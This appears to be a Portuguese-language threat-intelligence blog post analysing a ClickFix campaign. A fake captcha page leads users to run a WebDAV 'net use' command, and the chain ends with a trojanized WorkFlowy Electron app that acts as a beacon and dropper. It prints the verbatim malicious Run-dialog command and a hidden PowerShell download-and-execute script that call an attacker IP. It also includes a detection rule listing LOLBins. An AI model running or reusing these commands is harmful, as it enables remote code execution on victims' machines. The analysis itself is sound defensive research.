Investigando uma nova variante Click-Fix

Isenção de responsabilidade: Este relatório foi preparado pelo Centro de Pesquisa de Ameaças para aumentar a conscientização sobre segurança cibernética e apoiar o fortalecimento das capacidades de defesa. Baseia-se em pesquisas independentes e observações do atual cenário de ameaças disponíveis no momento da publicação. O conteúdo destina-se apenas a fins informativos e de preparação.

Leia mais blogs sobre inteligência de ameaças e pesquisa de adversários: https://atos.net/en/lp/cybershield

Resumo

Os pesquisadores da Atos identificaram uma nova variante da popular técnica ClickFix, onde invasores convencem o usuário a executar um comando malicioso em seu próprio dispositivo por meio do atalho Win + R. Nesta variação, um comando “net use” é usado para mapear uma unidade de rede de um servidor externo, após o qual um arquivo em lote “.cmd” hospedado nessa unidade é executado. O script baixa um arquivo ZIP, descompacta-o e executa o aplicativo WorkFlowy legítimo com lógica maliciosa modificada escondida dentro do arquivo “.asar”. Isso atua como um beacon C2 e um conta-gotas para a carga final do malware.

Figura 1: Visão geral de alto nível do fluxo de ataque.

Visão geral do ataque

Nesta versão, o vetor inicial de ataque é o mesmo de todas as outras, uma página web que se faz passar por um mecanismo de captcha – “happyglamper(.)ro”. Ele solicita que o usuário abra o aplicativo Executar via “Win+R”, seguido de “Ctrl+V” e “Enter”

Figura 2: Site de phishing 1

Figura 3: Site de phishing 2

Isso executa o seguinte comando:

“cmd.exe” /c net use Z: https://94.156.170(.)255/webdav /persistent:no && “Z:update.cmd” & net use Z: /delete

Normalmente, neste estágio, os invasores usaram o PowerShell ou o mshta para baixar e executar o próximo estágio do malware. Aqui, em vez disso, podemos ver que “net use” está sendo usado para mapear e conectar-se a uma unidade de rede de um servidor externo a partir do qual um script em lote é executado. Embora não sejam novidade, esses TTPs nunca foram vistos em ataques ClickFix antes. Combinada com os próximos estágios incomuns de padrões de infecção, esta campanha dá aos adversários grandes chances de escapar dos controles defensivos e permanecer sob o radar dos defensores.

Nesse caso, a variante ClickFix observada do fluxo de execução contornou com êxito a detecção do Microsoft Defender para Endpoint. As equipes de segurança da Atos só conseguiram detectá-lo graças ao serviço interno Threat Hunting com foco no principal aspecto comportamental da técnica ClickFix – execução inicial através da chave de registro RunMRU (consulta de caça disponível na seção Apêndice).

O script de execução inicial “update.cmd” é carregado da unidade mapeada e executado; depois disso, a unidade mapeada é removida. Conteúdo de “update.cmd”:

start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://94.156.170(.)255/flowy.zip' -OutFile "$env:TEMPdl.zip";
Expand-Archive "$env:TEMPdl.zip" -DestinationPath "$env:LOCALAPPDATAMyApp" -Force;
Start-Process "$env:LOCALAPPDATAMyAppWorkFlowy.exe""

Isso gera uma instância do PowerShell que baixa um arquivo zip e o extrai no diretório “%LOCALAPPDATA%MyApp”. Em seguida, ele executa o binário “WorkFlowy.exe”.

Figura 4: Conteúdo do arquivo flowy.zip

Análise WorkFlowy

O arquivo contém um aplicativo de desktop WorkFlowy (versão 1.4.1050), assinado pelo desenvolvedor “FunRoutine Inc.”, distribuído como um pacote de aplicativos Electron. Os aplicativos Electron são escritos usando tecnologias populares da web – HTML, CSS e JavaScript – e usam arquivos “.asar” para compactar o código-fonte durante o empacotamento do aplicativo. Isso é feito por vários motivos, como atenuar problemas relacionados a nomes de caminhos longos no Windows. O código malicioso foi injetado em main.js, o ponto de entrada Node.js do aplicativo, escondido dentro do arquivo app.asar.

Perfil Técnico

Propriedade	Valor
Aplicativo de destino	WorkFlowy Desktop (elétron)
Versão maliciosa	1.4.1050
Arquivo malicioso	recursos/app.asar → /main.js
Domínio C2	cloudflare.report/forever/e/
IP de origem C2	144(.)31(.)165(.)173 (Frankfurt, AS215439 play2go.cloud)
Domínio registrado	Janeiro de 2026, registrante de HK, registrador OnlineNIC
Arquivo de identificação da vítima	%APPDATA%id.txt
Diretório de teste do conta-gotas	%TEMP%(unix_timestamp)

Vetor de infecção

O arquivo ASAR malicioso é um substituto direto para os recursos/app.asar legítimos. O invasor reempacotou uma versão mais antiga do aplicativo (v1.4 versus a atual v4.3) com código injetado.

Figura 5: Conteúdo do subdiretório “recursos”

Código Malicioso (Dropper/Beacon)

Quando o WorkFlowy é executado, ele procura o arquivo app.asar no caminho relativo codificado no binário. Em seguida, ele lê o arquivo main.js de dentro dele, decodifica-o em uma string e analisa-o no mecanismo V8 Google JavaScript incorporado, que o executa. Os invasores substituíram o main.js legítimo por um que eles próprios criaram. Em vez de scripts bem estruturados, eles usaram uma estrutura on-line altamente ofuscada, adicionando código malicioso sobre o código legítimo, garantindo que ele fosse executado primeiro e bloqueando a funcionalidade do WorkFlowy.

O código malicioso contém várias funções críticas:

1. O malware é executado antes do aplicativo legítimo ser iniciado: O IIFE injetado abre com await f() — o loop infinito do beacon C2. Como f() nunca é resolvido, todo o código legítimo de inicialização do WorkFlowy a seguir é bloqueado permanentemente. O malware é executado com privilégios completos do Node.js imediatamente após o lançamento.

2. Impressão persistente de impressões digitais da vítima via %APPDATA%id.txt: Um ID alfanumérico aleatório de 8 caracteres é gerado na primeira execução e gravado em %APPDATA%id.txt. Nas execuções subsequentes, o ID armazenado é lido novamente, dando ao invasor um identificador estável para cada máquina vítima entre as sessões.

3. Beacon C2 – exfiltra a identidade do host a cada 2 segundos: A função u() envia um HTTP POST contendo o ID exclusivo da vítima, o nome da máquina e o nome de usuário do Windows para o servidor C2. O loop em f() repete isso indefinidamente com um intervalo de 2 segundos.

4. Download e execução remota de carga útil: A função p() recebe um objeto de tarefa do C2, decodifica o conteúdo do arquivo codificado em base64, grava-o em um diretório com carimbo de data e hora em% TEMP% e executa qualquer .exe via child_process.exec.

Se a conexão C2 não for estabelecida, nenhum arquivo ou diretório será gerado. No momento desta análise, o domínio C2 já não respondia.

Por que o Electron é um mecanismo de entrega eficaz

O código malicioso é executado no processo principal do Node.js – fora da sandbox do Chromium – com todos os privilégios do usuário logado, permitindo que o código malicioso execute quaisquer ações que o usuário tenha permissão para realizar no sistema. Na verdade, nenhum arquivo é gravado no disco e, como a carga maliciosa está compactada no arquivo “.asar”, também ajuda a ocultar o código malicioso.

Persistência

Nenhuma persistência no nível do sistema operacional é implementada por meio do conta-gotas. O beacon funciona apenas enquanto o WorkFlowy está aberto. O único artefato gravado no disco antes da entrega do próximo estágio é %APPDATA%id.txt (ID de rastreamento da vítima), e isso somente se a conexão com C2 for estabelecida corretamente. Presumivelmente, uma persistência no nível do sistema operacional é delegada a qualquer carga útil que o C2 entrega por meio do conta-gotas.

Leia mais blogs sobre inteligência de ameaças e pesquisa de adversários: https://atos.net/en/lp/cybershield

Principais conclusões

Essa variante do ClickFix é significativa porque afasta o acesso inicial de scripts e mecanismos de execução comumente abusados, como PowerShell, MSHTA e WScript, e, em vez disso, depende do uso da rede para abusar do WebDAV como mecanismo de entrega. As campanhas anteriores do ClickFix normalmente se expunham invocando diretamente intérpretes ou binários que vivem fora da terra, que são fortemente monitorados por soluções modernas de EDR. Por outro lado, esta iteração monta um compartilhamento WebDAV remoto como uma unidade local, executa um arquivo em lote hospedado por meio da semântica padrão do sistema de arquivos e remove o mapeamento imediatamente após o uso. Isso mostra que ClickFix ainda evolui, expandindo seu arsenal de métodos de execução de proxy e começando a utilizar utilitários de rede nativos.

A lógica maliciosa é ocultada pela substituição do conteúdo do arquivo app.asar do aplicativo Workflowy por uma versão trojanizada do main.js. Como o código é executado dentro do processo principal do Electron e permanece empacotado em um aplicativo legítimo, ele evita muitas detecções comportamentais e baseadas em arquivos que se concentram em carregadores independentes ou interpretadores de script. Os arquivos ASAR raramente são inspecionados, permitindo que a lógica do dropper seja executada durante a inicialização normal do aplicativo com visibilidade mínima.

Esta atividade não foi detectada pelos controles de segurança e só foi identificada através da caça direcionada a ameaças na Atos. A detecção baseou-se na análise do contexto de execução em vez de indicadores de carga útil, caçando especificamente execuções de comandos suspeitas originadas na caixa de diálogo Executar do Explorer (registrada dentro da chave de registro RunMRU). Isso ressalta a crescente importância da caça a ameaças como um mecanismo complementar de detecção: à medida que as campanhas ClickFix mudam para utilitários nativos e aplicativos confiáveis ​​que geram poucos alertas, apenas a caça proativa e baseada em hipóteses pode ajudar a revelar esses sinais fracos com antecedência suficiente para interromper a cadeia de ataque.

Apêndices

COIs

Consulta de caça

• título: Comandos suspeitos executados por meio da caixa de diálogo Executar
• identificação: 20891a30-032e-4f15-a282-fa4a8b0d8aae
• status: experimental
• descrição:
• Detecta interpretadores de comandos suspeitos e LOLBins gravados na chave de registro Explorer RunMRU (comumente usada para o histórico da caixa de diálogo Executar), com explorer.exe como processo inicial.
• autor: TRC
• data: 05/03/2026
• tags:
• – ataque.execução
• – ataque.t1059
• – ataque.defense_evasion
• fonte de registro:
• categoria: conjunto_de_registro
• produto: janelas
• definição: “ID de evento Sysmon 13 (conjunto de valores de registro) ou telemetria de registro EDR equivalente”
• detecção:
• chave_de_seleção:
• TargetObject|contém: ‘SOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU’
• seleção_proc:
• Imagem|termina com: ‘explorer.exe’
• dados_seleção:
• Detalhes | contém:
• – ‘cmd’
• – ‘powershell’
• – ‘cmd.exe’
• – ‘powershell.exe’
• – ‘wscript.exe’
• – ‘cscript.exe’
• – ‘net.exe’
• – ‘net1.exe’
• – ‘sh.exe’
• – ‘bash.exe’
• – ‘schtasks.exe’
• – ‘regsvr32.exe’
• – ‘hh.exe’
• – ‘wmic.exe’
• – ‘mshta.exe’
• -‘rundll32.exe’
• – ‘msiexec.exe’
• – ‘forfiles.exe’
• – ‘scriptrunner.exe’
• – ‘mftrace.exe’
• – ‘AppVLP.exe’
• – ‘svchost.exe’
• – ‘msbuild.exe’
• condição: seleção_chave e seleção_proc e seleção_dados
• falsos positivos:
• – “Atividade administrativa legítima usando a caixa de diálogo Executar (Win+R) para executar ferramentas integradas.”
• – “Scripts de TI ou etapas de solução de problemas executados interativamente por um usuário.”
• nível: médio

Leia mais blogs sobre inteligência de ameaças e pesquisa de adversários: https://atos.net/en/lp/cybershield